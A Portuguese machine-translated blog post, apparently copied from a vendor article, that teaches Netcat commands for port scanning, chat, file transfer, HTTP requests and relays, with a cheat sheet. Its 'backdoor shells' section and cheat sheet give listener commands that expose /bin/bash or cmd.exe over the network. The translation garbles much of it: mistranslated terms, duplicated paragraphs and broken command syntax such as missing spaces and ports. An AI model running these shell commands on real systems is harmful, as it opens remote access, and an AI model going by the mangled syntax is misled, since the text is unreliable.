Posted on by

Como usar os comandos Netcat: exemplos e folhas de batota

o programa utilitário Netcat suporta uma ampla gama de comandos para gerenciar redes e monitorar o fluxo de dados de tráfego entre sistemas. As redes de computadores, incluindo a world wide web, são construídas sobre a espinha dorsal do Protocolo de controle de transmissão (TCP) e do Protocolo de datagrama de usuário (UDP). Pense nele como uma ferramenta de companheiro livre e fácil de usar ao lado da Wireshark, especializada na análise de pacotes de rede., A versão original do Netcat foi lançada em 1995 e recebeu uma série de atualizações iterativas nas décadas seguintes.,

  • Netcat Comandos
    • uma Varredura de Porta com o Netcat Comandos
    • Criar um Chat ou um Servidor Web
    • Detalhado de Digitalização com o Netcat Comandos
    • Pedidos de HTTP com o Netcat Comandos
    • TCP do Servidor e de Cliente TCP Comandos
    • ITEM com NetCat Comandos
    • Evitar Pesquisa de DNS com o Netcat Comandos
  • Scripts com o Netcat
  • Shell Script com o Netcat
  • Lançamento Inversa (Backdoor) Conchas
  • Impressão Netcat Cheat Sheet
  • Adicionais Netcat Recursos

o Que é o Netcat é Usado?,

Netcat pode ser uma ferramenta útil para qualquer equipe de TI, embora o crescimento de serviços de rede gerenciados internamente e computação em nuvem façam desse ambiente um ajuste natural. Os administradores de rede e de sistema precisam ser capazes de identificar rapidamente como a sua rede está funcionando e que tipo de atividade está ocorrendo.

Get the Free Pen Testing Active Directory Environments ebook

“This really opened my eyes to AD security in a way defensive work never did.,”

Netcat funciona como uma ferramenta de back-end que permite a varredura de portas e a escuta de portas. Além disso, você pode realmente transferir arquivos diretamente através do Netcat ou usá-los como backdoor para outros sistemas em rede. Em parceria com uma ferramenta como Varonis Edge, você receberia um alerta de qualquer atividade incomum e poderia então usar o Netcat para investigar. Finalmente, o Netcat é uma ferramenta flexível por causa de como ele pode ser roteirizado para tarefas maiores.,

comandos básicos do Netcat

Uma vez que tenha uma aplicação do Netcat configurada no seu servidor Windows ou Linux, pode começar a executar comandos básicos para testar a sua funcionalidade. Aqui estão alguns para começar com:

nc-help – este comando irá imprimir uma lista de todos os comandos disponíveis que você pode usar no Netcat. Será útil se você encontrar quaisquer erros durante a escrita de um script ou não tem certeza de como proceder.

nc-z-v site.com – isto irá executar uma varredura de Porta Básica do site ou servidor especificado., O Netcat retornará resultados descritivos com listas de portos e Estados. Tenha em mente que você pode usar um endereço IP no lugar do domínio do site.

nc-l – Este comando irá instruir o sistema local para começar a ouvir as ligações TCP e a actividade UDP num número de porto específico.

nc site.com 1234 (menos de) nome do ficheiro-este comando irá iniciar a transferência de um ficheiro com base no número de porto indicado.

Printf-Netcat pode realmente funcionar como um hospedeiro web simplificado. Este comando permite-lhe gravar o código HTML e publicá-lo através do seu servidor local.,

sintaxe do comando Netcat

todos os comandos do Netcat devem começar com o identificador “netcat” ou “nc” como uma opção mais Curta. Por padrão, a ferramenta Netcat assumirá que você deseja realizar uma varredura de porta, a menos que você indique o contrário.

diferentes parâmetros de opções podem ser usados que incluem: “- u ” para tráfego UDP em vez de TCP,”- v “para saída descritiva,”- p “para especificar uma porta específica, e” – D ” para ligar o modo de depuração completo. Os atributos individuais dentro de um comando Netcat devem ser separados por um espaço., A linha de comandos informá-lo-á se tiver um erro de digitação ou um termo não reconhecido no seu script.

varredura de porta com comandos do Netcat

ao tentar diagnosticar um problema de rede ou de desempenho, executar uma varredura de porta com o Netcat é um primeiro passo inteligente a ser dado. A varredura irá verificar o estado de todas as portas no domínio ou endereço IP dado para que você possa determinar se um firewall ou outro mecanismo de bloqueio está no lugar.

um comando básico de varrimento de porta para um endereço IP ncat parece ser o seguinte:

nc-v-n 8.8.8.,8 1-1000

Note que os números no final do comando dizem ao Netcat para procurar apenas portos entre os números 1 e 1000.

Se você não sabe o endereço IP de um servidor ou site, então você pode procurá-lo através de um comando de terminal de ping ou apenas inserir o domínio no comando Netcat:

nc-v-n google.com 1-1000

Você deve sempre realizar varreduras de porta quando conectado à sua rede empresarial local. Caso contrário, poderá configurar o seu router com um serviço VPN para criar um túnel seguro para a rede.,

crie um Chat ou servidor web

os programas de Chat estão em ascensão. De soluções de código aberto para aqueles que pareciam ganhar repentinamente popularidade em massa, há uma ampla gama de chat e ferramentas de comunicação disponíveis para as organizações empresariais. A realidade é que alguns especialistas em TI e administradores de Sistema prefeririam uma solução simples de texto. O Windows Netcat pode realmente preencher essa necessidade e permitir a transmissão de mensagens através de uma rede local.

para começar, você primeiro precisa do Netcat para começar a ouvir em um número de porta., Certifique-se de não escolher um porto que já está em uso por outra aplicação ou serviço.

nc -l -p 1299

em Seguida, tudo que você precisa fazer é iniciar a sessão de chat com uma nova conexão TCP:

nc localhost 1299

Este processo também pode ser usado para girar uma básicas do servidor web a partir de sua máquina local. O Netcat funcionará como hospedeiro web e lhe permitirá armazenar conteúdo HTML que pode então ser visto através de um navegador web.

primeiro, crie um novo documento de texto no seu sistema local e certifique-se de usar etiquetas HTML válidas. Em seguida, salve o arquivo como ” índice.,html ” e armazená-lo na raiz de seu diretório Netcat. Agora volte para a ferramenta Netcat e execute este comando:

printf ‘HTTP / 1.1 200 OK\n\n%s’ “$(cat index.html) | / netcat-l 8999

para ver o HTML em ação, basta abrir qualquer navegador web e navegar para o seu endereço IP local com: 8999 no final para especificar o porto da máquina.

varredura Descritiva com os comandos do Netcat

cada comando que executar no Netcat incluirá um determinado texto de saída para indicar se foi ou não bem sucedido., Para fins de resolução de problemas e depuração, você vai querer reunir o máximo de informações e logs possível, investindo também em soluções como Varonis Datalert para detectar ameaças e responder rapidamente. O Netcat pode ajudar graças ao parâmetro descritivo que pode ser adicionado a qualquer comando básico do Netcat. Basta incluir “- v ” ao seu comando e executá-lo novamente.

mesmo com esta configuração ligada, o Netcat não revelará nenhuma das suas credenciais ou dados de autenticação.

solicitações HTTP com comandos do Netcat

nós cobrimos como você pode usar o Netcat para hospedar páginas HTML em seu sistema local., Mas o programa de utilidade pública também pode ser usado para fazer pedidos web para servidores externos. Desta forma, o Netcat funcionará essencialmente como um navegador web, obtendo código HTML raw.

juntamente com uma ferramenta como Varonis Edge, o Netcat pode ser útil para os profissionais de TI que estão olhando para problemas de tráfego na internet ou proxies. Aqui está um exemplo de como obter o conteúdo HTML da página inicial do Google:

printf “GET / HTTP/1.0\r\n\r\n” | nc google.com 80

Note que o número da porta 80 é necessária para este tipo de comando, pois a world wide web utiliza-lo como um padrão para TCP sobre IP conexões.,

TCP Server and TCP Client Commands

Although the TCP protocol is primarily used for transfer web traffic around the world, it can actually be implemented at a local level for file transfers. Para conseguir isso, você precisa executar o Netcat a partir de dois locais: um que vai atuar como um servidor para enviar o arquivo e um que vai agir como o cliente para recebê-lo.

execute este comando Netcat na instância do servidor para enviar o ficheiro Sobre a porta 1499:

nc-l 1499> nome do ficheiro.,fora

em Seguida, execute este comando no cliente para aceitar, receber e fechar a conexão:

nc server.com 1499 (menor que) o nome do arquivo.em

certifique-se de substituir “server.com” com o nome completo ou o endereço IP do servidor de envio.

ITEM com comandos do Netcat

versões mais recentes do Netcat permitem que você use o formato do ITEM para a transferência de dados em vez dos protocolos padrão TCP ou UDP., Para conseguir isso, você deve seguir esta sintaxe:

file_ Path (pipe) device_path (pipe) network host

prevenir a pesquisa do DNS com os comandos do Netcat

os comandos do Netcat correm mais rápido quando estão operando apenas em endereços IP. Isto porque não é desperdiçado tempo a falar com servidores de nomes de domínio (DNS) para traduzir nomes de servidores para endereços IP. Se você descobrir que seus comandos do Netcat ainda estão em execução lenta, certifique-se de adicionar o operador “- n” Para que o utilitário saiba que as pesquisas do DNS não são necessárias.,

Shell Scripting with Netcat

como mencionado anteriormente, um dos benefícios do uso do Netcat é que ele pode ser incluído como parte de um script maior que executa uma função automatizada. Como parte de seus procedimentos de segurança, você pode querer executar uma varredura de port completo em todos os seus servidores para detectar novas aplicações maliciosas que estão à escuta de uma conexão.

Você poderia escrever um script que:

1. Importa um arquivo de texto de nomes de servidores ou endereços IP
2. Chama o Netcat para executar uma varredura de porta em cada servidor
3., Escreve a saída para um novo arquivo de texto para análise

múltiplos comandos do Netcat podem ser agrupados em um único script e ser executados através de uma linha de comandos Linux ou Windows. Em alguns casos, pode valer a pena ter os scripts em um horário regular.

Lançamento Inversa (Backdoor) Conchas

Para começar, você precisa habilitar a ferramenta de shell através de um comando Netcat usando o Netcat shell reverso:

nc -n -v -l -p 5555 -e /bin/bash

em Seguida, a partir de qualquer outro sistema em rede, você pode testar como executar comandos no host após a bem-sucedida Netcat conexão em bash.,

nc-nv 127.0.0.1 5555

uma linha de comandos invertida é uma abordagem de acesso remoto onde executa comandos administrativos de um terminal enquanto se liga a outro servidor na rede. Para começar, você precisa habilitar a ferramenta de shell através de um comando Netcat usando o Netcat shell reverso:

nc -n -v -l -p 5555 -e /bin/bash

em Seguida, a partir de qualquer outro sistema em rede, você pode testar como executar comandos do host selecionado após a bem-sucedida Netcat conexão em bash:

nc -nv 127.0.0.,1 5555

folha de batota do Netcat

até começar a utilizar o Netcat numa base regular, poderá ficar confuso sobre a sintaxe do comando ou esquecer o que alguns dos parâmetros fazem. Não te preocupes! Incluímos uma cábula abaixo para ajudá-lo a encontrar o que precisa rapidamente para executar um comando netcat em funcionamento.,

o Netcat Fundamentos

nc – por padrão, isso irá executar uma varredura de porta

nc -l – inicia uma escuta na porta dada

o Netcat Comando Bandeiras

-4 nc – utilizar somente IPv4

nc -6 – se utilizar IPv6

nc -u – usa o UDP em vez do TCP

nc -k -l – continuar a ouvir depois de desligar

nc -n – ignorar pesquisas de DNS

nc -v – fornecer detalhado de saída

o Netcat Relés no Windows

nc > relé.bat-abrir uma ligação relé

relé nc-l-p-E.,bat-connect to relay

relés Netcat on Linux

nc-l-p 0 (less than) backpipe (pipe) nc (pipe) tee backpipe

Netcat File Transfer

nc (greater than) file_name.enviar um ficheiro

nc (inferior a) file_name.in -receive a file

Netcat Port Scanner

nc-zv site.com 80-analisar uma única porta

nc-zv hostname.com 80 84-analisar um conjunto de portas individuais

nc-zv.,com 80-84 – verificação de um intervalo de portas

o Netcat Banners

echo “” | nc-zv -wl – obter o TCP banners para um intervalo de portas

o Netcat Backdoor Conchas

nc -l -p-e /bin/bash – executar um shell no Linux

nc -l -p-e cmd.,exe – executar um shell no Netcat para o Windows

Adicionais Netcat Recursos

  • O Potencial do Netcat
  • Usando o Netcat com RedHat
  • Introdução ao Netcat no Youtube
  • o Netcat para a Segurança
  • lições Divertidas com o Netcat

Em rápido de hoje-alterar mundo da tecnologia e cada vez mais complexas redes, as empresas precisam ser pró-ativo quando se trata de segurança cibernética. Isso significa contratar especialistas que saibam que ameaças procurar e como combatê-las., Caso contrário, uma única instância de um ciberataque como o ransomware poderia levar a danos duradouros para toda a organização. A combinação de soluções da Varonis com ferramentas como o Netcat ajudará a manter sua rede interna mais segura.

Published by admin

Deixe uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *